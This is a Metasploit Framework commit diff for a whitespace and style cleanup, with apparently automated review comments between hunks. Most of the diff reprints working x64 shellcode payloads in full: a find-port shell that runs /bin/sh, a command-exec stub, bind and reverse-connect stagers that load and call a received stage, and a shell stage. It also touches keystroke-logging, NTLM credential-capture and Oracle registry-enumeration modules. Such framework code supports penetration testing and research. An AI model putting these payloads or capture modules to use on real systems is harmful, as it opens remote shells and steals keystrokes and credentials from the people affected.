Merge branch 'msftidy_police' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-msftidy_police
commit
291ad27a69
|
@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
|
||||
end
|
||||
|
||||
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
|
||||
::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) }
|
||||
|
||||
if nice.length > 0
|
||||
print_good("[#{cid}] Keys: #{nice}")
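Review bot: The two rewritten `::File.open( @client_cache[cid][:path_clean], "ab")` / `::File.open( @client_cache[cid][:path_raw], "ab")` lines keep a space after the opening parenthesis and repeat the `@client_cache[cid]` lookup, which is the kind of thing this tidy-up commit is otherwise removing. Hoisting the entry once, `entry = @client_cache[cid]`, and writing `::File.open(entry[:path_clean], 'ab') { |fd| fd.puts nice }` and `::File.open(entry[:path_raw], 'ab') { |fd| fd.write(real) }` reads cleaner and makes it obvious both writes go to the same cache record. The switch to `"ab"` looks intended to keep the raw keystroke bytes untranslated; a short comment on the raw write such as `# binary mode so raw key bytes are written unmodified` would record why the two modes differ from the clean log's `puts`. The enclosing method starts before this hunk.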
|
||||
|
|
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("Request '#{request.uri}'...")
|
||||
|
||||
|
||||
case request.method
|
||||
when 'OPTIONS'
|
||||
process_options(cli, request)
|
||||
|
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
||||
def process_options(cli, request)
|
||||
print_status("OPTIONS #{request.uri}")
|
||||
headers = {
|
||||
|
|
|
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# Handles the initial requests waiting for the browser to try NTLM auth
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
|
||||
case request.method
|
||||
when 'OPTIONS'
|
||||
process_options(cli, request)
|
||||
|
@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
parse_args()
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
||||
def process_options(cli, request)
|
||||
print_status("OPTIONS #{request.uri}")
|
||||
headers = {
|
||||
|
|
|
@ -38,50 +38,50 @@ module Metasploit3
|
|||
'CPORT' => [ 32, 'n' ],
|
||||
},
|
||||
|
||||
'Assembly' => <<EOS
|
||||
xor rdi,rdi
|
||||
xor rbx,rbx
|
||||
mov bl,0x14
|
||||
sub rsp,rbx
|
||||
lea rdx,[rsp]
|
||||
lea rsi,[rsp+4]
|
||||
find_port:
|
||||
push 0x34 ; getpeername
|
||||
pop rax
|
||||
syscall
|
||||
inc rdi
|
||||
cmp word [rsi+2],0x4142
|
||||
jne find_port
|
||||
dec rdi
|
||||
push 2
|
||||
pop rsi
|
||||
dup2:
|
||||
push 0x21 ; dup2
|
||||
pop rax
|
||||
syscall
|
||||
dec rsi
|
||||
jns dup2
|
||||
mov rbx,rsi
|
||||
mov ebx, 0x68732f41
|
||||
mov eax,0x6e69622f
|
||||
shr rbx,8
|
||||
shl rbx,32
|
||||
or rax,rbx
|
||||
push rax
|
||||
mov rdi,rsp
|
||||
xor rsi,rsi
|
||||
mov rdx,rsi
|
||||
push 0x3b ; execve
|
||||
pop rax
|
||||
syscall
|
||||
EOS
|
||||
'Assembly' => %Q|
|
||||
xor rdi,rdi
|
||||
xor rbx,rbx
|
||||
mov bl,0x14
|
||||
sub rsp,rbx
|
||||
lea rdx,[rsp]
|
||||
lea rsi,[rsp+4]
|
||||
find_port:
|
||||
push 0x34 ; getpeername
|
||||
pop rax
|
||||
syscall
|
||||
inc rdi
|
||||
cmp word [rsi+2],0x4142
|
||||
jne find_port
|
||||
dec rdi
|
||||
push 2
|
||||
pop rsi
|
||||
dup2:
|
||||
push 0x21 ; dup2
|
||||
pop rax
|
||||
syscall
|
||||
dec rsi
|
||||
jns dup2
|
||||
mov rbx,rsi
|
||||
mov ebx, 0x68732f41
|
||||
mov eax,0x6e69622f
|
||||
shr rbx,8
|
||||
shl rbx,32
|
||||
or rax,rbx
|
||||
push rax
|
||||
mov rdi,rsp
|
||||
xor rsi,rsi
|
||||
mov rdx,rsi
|
||||
push 0x3b ; execve
|
||||
pop rax
|
||||
syscall
|
||||
|
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
def size
|
||||
return 91
|
||||
end
|
||||
def size
|
||||
return 91
|
||||
end
|
||||
|
||||
|
||||
end
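Review bot: The new `'Assembly' => %Q|` literal is terminated by a bare `|`, so any `|` that later appears inside the instruction listing (NASM accepts it as bitwise-or in an operand expression) would end the string early and silently truncate the shellcode, and the literal now begins with a newline where the `<<EOS` heredoc it replaces began directly with `xor rdi,rdi`. Whether the assembler tolerates that leading newline and the per-line indentation I cannot confirm from the hunk; an indentable heredoc, `'Assembly' => <<-EOS` closed by an indented `EOS`, would avoid the delimiter hazard while keeping the block readable. The `def size` that follows still returns the hard-coded `91` with an explicit `return`, leaving the length coupled by hand to the listing above it; `def size; 91; end` plus a comment like `# Must equal the assembled length of 'Assembly' above; re-check after any edit` would make that dependency explicit, since the value itself cannot be verified from this hunk.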
|
||||
|
|
|
@ -38,10 +38,10 @@ module Metasploit3
|
|||
payload =
|
||||
"\x48\x31\xC0" + # xor rax,rax
|
||||
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
|
||||
call +
|
||||
"/usr/bin/say\x00" +
|
||||
call +
|
||||
"/usr/bin/say\x00" +
|
||||
say +
|
||||
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||
"\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd]
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x52" + # push rdx
|
||||
|
|
|
@ -44,41 +44,41 @@ module Metasploit3
|
|||
cmd = (datastore['CMD'] || '') << "\x00"
|
||||
call = "\xe8" + [cmd.length].pack('V')
|
||||
|
||||
payload =
|
||||
"\x48\x31\xFF" + # xor rdi,rdi
|
||||
"\x57" + # push rdi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x6A\x04" + # push byte +0x4
|
||||
"\x5A" + # pop rdx
|
||||
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xC9" + # xor r9,r9
|
||||
"\x48\xFF\xCF" + # dec rdi
|
||||
"\x48\xFF\xC7" + # inc rdi
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
|
||||
datastore['TAG'] +
|
||||
"\x75\xED" + # jnz 0x17
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||
"\x48\xFF\xC6" + # inc rsi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x31\xC0" + # xor rax,rax
|
||||
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
|
||||
call +
|
||||
cmd +
|
||||
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x52" + # push rdx
|
||||
"\x57" + # push rdi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x0F\x05" # loadall286
|
||||
payload =
|
||||
"\x48\x31\xFF" + # xor rdi,rdi
|
||||
"\x57" + # push rdi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x6A\x04" + # push byte +0x4
|
||||
"\x5A" + # pop rdx
|
||||
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xC9" + # xor r9,r9
|
||||
"\x48\xFF\xCF" + # dec rdi
|
||||
"\x48\xFF\xC7" + # inc rdi
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
|
||||
datastore['TAG'] +
|
||||
"\x75\xED" + # jnz 0x17
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||
"\x48\xFF\xC6" + # inc rsi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x31\xC0" + # xor rax,rax
|
||||
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
|
||||
call +
|
||||
cmd +
|
||||
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x52" + # push rdx
|
||||
"\x57" + # push rdi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x0F\x05" # loadall286
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -27,67 +27,67 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' => { 'LPORT' => [ 31, 'n'] },
|
||||
'Payload' =>
|
||||
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
|
||||
"\x6A\x02" + # push byte +0x2
|
||||
"\x5F" + # pop rdi
|
||||
"\x6A\x01" + # push byte +0x1
|
||||
"\x5E" + # pop rsi
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x89\xC7" + # mov rdi,rax
|
||||
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x56" + # push rsi
|
||||
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
|
||||
"\x56" + # push rsi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x6A\x10" + # push byte +0x10
|
||||
"\x5A" + # pop rdx
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x48\xFF\xC6" + # inc rsi
|
||||
"\x49\x89\xFC" + # mov r12,rdi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
|
||||
"\x4C\x89\xE7" + # mov rdi,r12
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x48\x89\xE2" + # mov rdx,rsp
|
||||
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x49\x89\xC5" + # mov r13,rax
|
||||
"\x48\x89\xC7" + # mov rdi,rax
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\x51" + # push rcx
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xD2" + # xor r10,r10
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x41\x5B" + # pop r11
|
||||
"\x4C\x89\xDE" + # mov rsi,r11
|
||||
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
|
||||
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
|
||||
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
|
||||
"\x48\x31\xFF" + # xor rdi,rdi
|
||||
"\x48\xFF\xCF" + # dec rdi
|
||||
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
|
||||
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
|
||||
"\x49\x89\xF8" + # mov r8,rdi
|
||||
"\x4D\x31\xC9" + # xor r9,r9
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x89\xC6" + # mov rsi,rax
|
||||
"\x56" + # push rsi
|
||||
"\x4C\x89\xEF" + # mov rdi,r13
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\x4C\x89\xDA" + # mov rdx,r11
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xD2" + # xor r10,r10
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x58" + # pop rax
|
||||
"\xFF\xD0" # call rax
|
||||
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
|
||||
"\x6A\x02" + # push byte +0x2
|
||||
"\x5F" + # pop rdi
|
||||
"\x6A\x01" + # push byte +0x1
|
||||
"\x5E" + # pop rsi
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x89\xC7" + # mov rdi,rax
|
||||
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x56" + # push rsi
|
||||
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
|
||||
"\x56" + # push rsi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x6A\x10" + # push byte +0x10
|
||||
"\x5A" + # pop rdx
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x48\xFF\xC6" + # inc rsi
|
||||
"\x49\x89\xFC" + # mov r12,rdi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
|
||||
"\x4C\x89\xE7" + # mov rdi,r12
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x48\x89\xE2" + # mov rdx,rsp
|
||||
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x49\x89\xC5" + # mov r13,rax
|
||||
"\x48\x89\xC7" + # mov rdi,rax
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\x51" + # push rcx
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xD2" + # xor r10,r10
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x41\x5B" + # pop r11
|
||||
"\x4C\x89\xDE" + # mov rsi,r11
|
||||
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
|
||||
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
|
||||
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
|
||||
"\x48\x31\xFF" + # xor rdi,rdi
|
||||
"\x48\xFF\xCF" + # dec rdi
|
||||
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
|
||||
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
|
||||
"\x49\x89\xF8" + # mov r8,rdi
|
||||
"\x4D\x31\xC9" + # xor r9,r9
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x89\xC6" + # mov rsi,rax
|
||||
"\x56" + # push rsi
|
||||
"\x4C\x89\xEF" + # mov rdi,r13
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\x4C\x89\xDA" + # mov rdx,r11
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xD2" + # xor r10,r10
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x58" + # pop rax
|
||||
"\xFF\xD0" # call rax
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -31,19 +31,19 @@ module Metasploit3
|
|||
'LPORT' => [ 35, 'n']
|
||||
},
|
||||
'Payload' =>
|
||||
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
|
||||
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
|
||||
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
|
||||
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
|
||||
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
|
||||
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
|
||||
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
|
||||
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
|
||||
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
|
||||
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
|
||||
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
|
||||
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
|
||||
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
|
||||
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
|
||||
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
|
||||
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
|
||||
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
|
||||
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
|
||||
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
|
||||
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
|
||||
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
|
||||
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
|
||||
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
|
||||
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
|
||||
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
|
||||
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -26,11 +26,11 @@ module Metasploit3
|
|||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
|
||||
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
|
||||
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
|
||||
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
|
||||
"\x52\x57\x48\x89\xe6\x0f\x05"
|
||||
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
|
||||
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
|
||||
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
|
||||
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
|
||||
"\x52\x57\x48\x89\xe6\x0f\x05"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -181,18 +181,18 @@ class Metasploit3 < Msf::Post
|
|||
found_key = false
|
||||
basekey_set = ["HKLM\\SOFTWARE\\Oracle\\SYSMAN","HKLM\\SOFTWARE\\ORACLE\\KEY_XE"]
|
||||
basekey_set.each do |basekey|
|
||||
next if found_key
|
||||
next if found_key
|
||||
instances = registry_enumkeys(basekey)
|
||||
if instances.nil? or instances.empty?
|
||||
next
|
||||
else
|
||||
found_key = true
|
||||
end
|
||||
|
||||
|
||||
instances.each do |i|
|
||||
if basekey.include?"KEY_XE"
|
||||
val_ORACLE_SID = registry_getvaldata(basekey,"ORACLE_SID")
|
||||
val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME")
|
||||
val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME")
|
||||
else
|
||||
key = "#{basekey}\\#{i}"
|
||||
val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")
|
||||
|
|